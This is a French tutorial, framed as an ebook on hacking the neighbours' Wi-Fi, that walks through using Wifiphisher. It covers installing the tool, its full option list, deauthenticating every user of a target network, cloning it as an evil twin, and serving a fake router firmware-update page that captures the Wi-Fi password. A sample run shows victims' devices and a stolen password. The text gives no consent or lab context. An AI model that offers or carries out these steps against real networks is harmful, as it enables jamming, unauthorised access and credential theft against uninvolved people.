Ebook Phishing Wifi
Ebook Phishing Wifi
Ebook Phishing Wifi
hacker le wifi
des voisins
Alors que le craquage de mots de passe attirent beaucoup d'attention, les attaques par ingénierie sociale sont de loin le
moyen le plus rapide d'obtenir un mot de passe Wi-Fi. L'une des plus puissantes attaques d'ingénierie sociale Wi-Fi est
le Wifiphisher, un outil qui bloque l'accès internet jusqu'à ce que des utilisateurs désespérés entrent le mot de passe Wi-
Fi pour permettre la mise à jour du micrologiciel d'un faux routeur.
Les attaques d'ingénierie sociale sont puissantes car elles contournent souvent complètement la sécurité. Si vous pouvez
tromper un employé en lui faisant entrer un mot de passe sur une fausse page de connexion, la force du mot de passe n'a
pas d'importance.
Ne pas connaître la force du mot de passe que vous attaquez peut être frustrant, car investir le temps et la puissance de
traitement nécessaires à un dictionnaire ou à une attaque par la force brute peut sembler être un énorme gaspillage de
ressources. Au lieu de cela, des outils comme Wifiphisher posent des questions sur les personnes qui se cachent derrière
ces réseaux.
L'utilisateur moyen sait-il à quoi ressemble la page de connexion de son routeur Wi-Fi ? Le remarquerait-il s'il était dif-
férent ? Plus important encore, un utilisateur occupé, coupé d'Internet et stressé par la perturbation, pourrait-il toujours
entrer son mot de passe pour permettre une fausse mise à jour même s'il remarquait que la page de connexion était un
peu différente ?
Wifiphisher pense que la réponse est "oui". L'outil peut sélectionner n'importe quel réseau Wi-Fi à proximité, désau-
thentifier tous les utilisateurs (le brouiller) et créer un point d'accès cloné qui ne nécessite pas de mot de passe pour y
accéder. Tout utilisateur qui se connecte à ce réseau ouvert, semblable à un jumeau maléfique, reçoit une page de phish-
ing convaincante qui demande le mot de passe Wi-Fi pour permettre une mise à jour du micrologiciel, ce qui est expli-
qué comme la raison pour laquelle le Wi-Fi a cessé de fonctionner.
C'est alors qu'ils remarquent un nouveau réseau, portant le même nom que l'ancien, mais ne nécessitant pas de mot de
passe. Après quelques tentatives supplémentaires pour rejoindre le réseau protégé, ils rejoignent le réseau ouvert par
crainte que leur routeur ne diffuse soudainement un réseau sans mot de passe auquel n'importe qui peut y accéder. Dès
qu'ils rejoignent le réseau, une page web officielle mentionnant le fabricant de leur routeur s'ouvre et les informe que le
routeur est en train de subir une mise à jour critique de son micrologiciel. Tant qu'ils n'auront pas entré le mot de passe
pour appliquer la mise à jour, l'internet ne fonctionnera pas.
Après avoir saisi le mot de passe Wi-Fi super sécurisé, un écran de chargement commence à s'afficher au redémarrage
du routeur, et ils se sentent un peu fiers d'avoir pris la sécurité de leur routeur au sérieux en installant cette mise à jour
critique. Après une minute d'attente, leurs appareils se reconnectent au réseau, désormais plus sûr grâce à la mise à jour
installée.
Un accès facile
Pour un hacker, obtenir les mots de passe est aussi simple que de sélectionner le réseau que vous souhaitez cibler. Après
avoir désigné une cible, Wifiphisher brouille immédiatement tous les appareils connectés au réseau, maximisant ainsi
les chances qu'une personne connectée au réseau soit frustrée et applique la fausse mise à jour. Ensuite, les informations
réseau de la cible sont clonées et le faux réseau Wi-Fi est diffusé pour faire croire à la cible que son routeur fonctionne
dans un mode de mise à jour non spécifié.
Les appareils qui se connectent sont immédiatement enregistrés sur une liste, et la page de phishing est adaptée au fabri-
cant du routeur en lisant la première partie de l'adresse MAC du routeur. Après avoir piégé l'une des cibles connectées
au réseau visé pour qu'elle entre le mot de passe, Wifiphisher informe le pirate tout en temporisant. Après avoir envoyé
le mot de passe capturé, la cible est cruellement occupée avec un faux écran de chargement de mise à jour et un faux
minuteur de redémarrage pour gagner du temps au hacker afin qu'il puisse tester le mot de passe capturé.
Ce dont vous aurez besoin
Pour que cette attaque fonctionne, vous aurez besoin d'un adaptateur de réseau sans fil compatible avec Kali Linux.
Outre un bon adaptateur réseau sans fil, vous aurez besoin d'un ordinateur équipé de Kali Linux, que vous devrez
d'abord mettre à jour en exécutant
~# apt update
~# apt upgrade
Si vous ne le faites pas, vous aurez très probablement des problèmes lors du processus d'installation de Wifiphisher ci-
dessous.
Si vous voulez essayer de l'installer à partir du dépôt GitHub, vous pouvez le faire en clonant le dépôt et en suivant les
instructions sur la page GitHub, comme tel :
~# git clone https://github.com/wifiphisher/wifiphisher.git
~# cd wifiphisher
~# sudo python setup.py install
Cela devrait permettre d'installer Wifiphisher, que vous pouvez désormais lancer en tapant simplement le nom du pro-
gramme dans une fenêtre de terminal.
Step 2 Options Wifiphisher
Vous devriez pouvoir exécuter le script à tout moment en tapant simplement :
~# sudo wifiphisher
dans une fenêtre de terminal. Bien que Wifiphisher n'ait pas de page de manuel, vous pouvez voir dans sa page --help
qu'il possède une liste assez impressionnante d'options de configuration que vous pouvez modifier en ajoutant divers
options à la commande.
~# wifiphisher --help
optional arguments:
-h, --help show this help message and exit
-i INTERFACE, --interface INTERFACE
Manually choose an interface that supports both AP and
monitor modes for spawning the rogue AP as well as
mounting additional Wi-Fi attacks from Extensions
(i.e. deauth). Example: -i wlan1
-eI EXTENSIONSINTERFACE, --extensionsinterface EXTENSIONSINTERFACE
Manually choose an interface that supports monitor
mode for deauthenticating the victims. Example: -eI
wlan1
-aI APINTERFACE, --apinterface APINTERFACE
Manually choose an interface that supports AP mode for
spawning the rogue AP. Example: -aI wlan0
-iI INTERNETINTERFACE, --internetinterface INTERNETINTERFACE
Choose an interface that is connected on the
InternetExample: -iI ppp0
-iAM MAC_AP_INTERFACE, --mac-ap-interface MAC_AP_INTERFACE
Specify the MAC address of the AP interface
-iEM MAC_EXTENSIONS_INTERFACE, --mac-extensions-interface MAC_EXTENSIONS_IN-
TERFACE
Specify the MAC address of the extensions interface
-iNM, --no-mac-randomization
Do not change any MAC address
-kN, --keepnetworkmanager
Do not kill NetworkManager
-nE, --noextensions Do not load any extensions.
-nD, --nodeauth Skip the deauthentication phase.
-dC DEAUTH_CHANNELS [DEAUTH_CHANNELS ...], --deauth-channels DEAUTH_CHANNELS
[DEAUTH_CHANNELS ...]
Channels to deauth. Example: --deauth-channels 1,3,7
-e ESSID, --essid ESSID
Enter the ESSID of the rogue Access Point. This option
will skip Access Point selection phase. Example:
--essid 'Free WiFi'
-dE DEAUTH_ESSID, --deauth-essid DEAUTH_ESSID
Deauth all the BSSIDs in the WLAN with that ESSID.
-p PHISHINGSCENARIO, --phishingscenario PHISHINGSCENARIO
Choose the phishing scenario to run.This option will
skip the scenario selection phase. Example: -p
firmware_upgrade
-pK PRESHAREDKEY, --presharedkey PRESHAREDKEY
Add WPA/WPA2 protection on the rogue Access Point.
Example: -pK s3cr3tp4ssw0rd
-hC HANDSHAKE_CAPTURE, --handshake-capture HANDSHAKE_CAPTURE
Capture of the WPA/WPA2 handshakes for verifying
passphraseExample : -hC capture.pcap
-qS, --quitonsuccess Stop the script after successfully retrieving one pair
of credentials
-lC, --lure10-capture
Capture the BSSIDs of the APs that are discovered
during AP selection phase. This option is part of
Lure10 attack.
-lE LURE10_EXPLOIT, --lure10-exploit LURE10_EXPLOIT
Fool the Windows Location Service of nearby Windows
users to believe it is within an area that was
previously captured with --lure10-capture. Part of the
Lure10 attack.
--logging Log activity to file
-dK, --disable-karma Disables KARMA attack
-lP LOGPATH, --logpath LOGPATH
Determine the full path of the logfile.
-cP CREDENTIAL_LOG_PATH, --credential-log-path CREDENTIAL_LOG_PATH
Determine the full path of the file that will store
any captured credentials
--payload-path PAYLOAD_PATH
Payload path for scenarios serving a payload
-cM, --channel-monitor
Monitor if target access point changes the channel.
-wP, --wps-pbc Monitor if the button on a WPS-PBC Registrar is
pressed.
-wAI WPSPBC_ASSOC_INTERFACE, --wpspbc-assoc-interface WPSPBC_ASSOC_INTERFACE
The WLAN interface used for associating to the WPS
AccessPoint.
-kB, --known-beacons Broadcast a number of beacon frames advertising
popular WLANs
-fH, --force-hostapd Force the usage of hostapd installed in the system
-pPD PHISHING_PAGES_DIRECTORY, --phishing-pages-directory PHISHING_PAGES_DI-
RECTORY
Search for phishing pages in this location
--dnsmasq-conf DNSMASQ_CONF
Determine the full path of a custom dnmasq.conf file
-pE PHISHING_ESSID, --phishing-essid PHISHING_ESSID
Determine the ESSID you want to use for the phishing
page
Step 3 Brancher votre adaptateur WIFI
~# wifiphisher -i wlan1
Ensuite, nous devrions voir une page montrant tous les réseaux voisins. Nous pouvons sélectionner le réseau que nous
voulons attaquer ici, et appuyer sur la touche Entrée.
Options: [Esc] Quit [Up Arrow] Move Up [Down Arrow] Move Down
Ensuite, le script vous demandera quelle attaque vous voulez lancer. Sélectionnez l'option 2.
Options: [Esc] Quit [Up Arrow] Move Up [Down Arrow] Move Down
Après avoir sélectionné l'attaque, elle sera immédiatement lancée. Une page s'ouvrira pour surveiller les cibles qui re-
joignent le réseau. Wifiphisher écoutera également les appareils qui tentent de se connecter à des réseaux qui ne sont
pas présents, et il créera des versions factices pour attirer ces appareils à se connecter.
HTTPS requests:
Après la connexion d'une cible, un pop-up lui demandera d'entrer le mot de passe.
Lorsque la cible entre le mot de passe, nous sommes avertis dans l'écran du Wifiphisher.
Extensions feed:
DEAUTH/DISAS - █ █ █ █ █ █ █ █ █ █ █ █ █ █ █ █ █ █
DEAUTH/DISAS - █ █ █ █ █ █ █ █ █ █ █ █ █ █ █ █ █ █
DEAUTH/DISAS - █ █ █ █ █ █ █ █ █ █ █ █ █ █ █ █ █ █
Victim █ █ █ █ █ █ █ █ █ █ █ █ █ █ █ █ █ █ probed for WLAN with ESSID: 'FakeNed' (KARMA)
Victim █ █ █ █ █ █ █ █ █ █ █ █ █ █ █ █ █ █ probed for WLAN with ESSID: 'Harmond Fernandez' (Evil
Twin)
Connected Victims:
█ █ █ █ █ █ █ █ █ █ █ █ █ █ █ █ █ █ 10.0.0.13 Apple iOS/MacOS
█ █ █ █ █ █ █ █ █ █ █ █ █ █ █ █ █ █ 10.0.0.29 Murata Manufacturing
HTTPS requests:
[*] GET request from 10.0.0.13 for http://captive.apple.com/hotspot-detect.html
[*] GET request from 10.0.0.13 for http://captive.apple.com/hotspot-detect.html
[*] GET request from 10.0.0.13 for http://captive.apple.com/hotspot-detect.html
[*] POST request from 10.0.0.13 with wfphshr-wpa-password=myfatpassword
[*] GET request from 10.0.0.13 for http://captive.apple.com/hotspot-detect.html
C'est tout ! Le scénario se termine et vous présente le mot de passe que vous venez de saisir.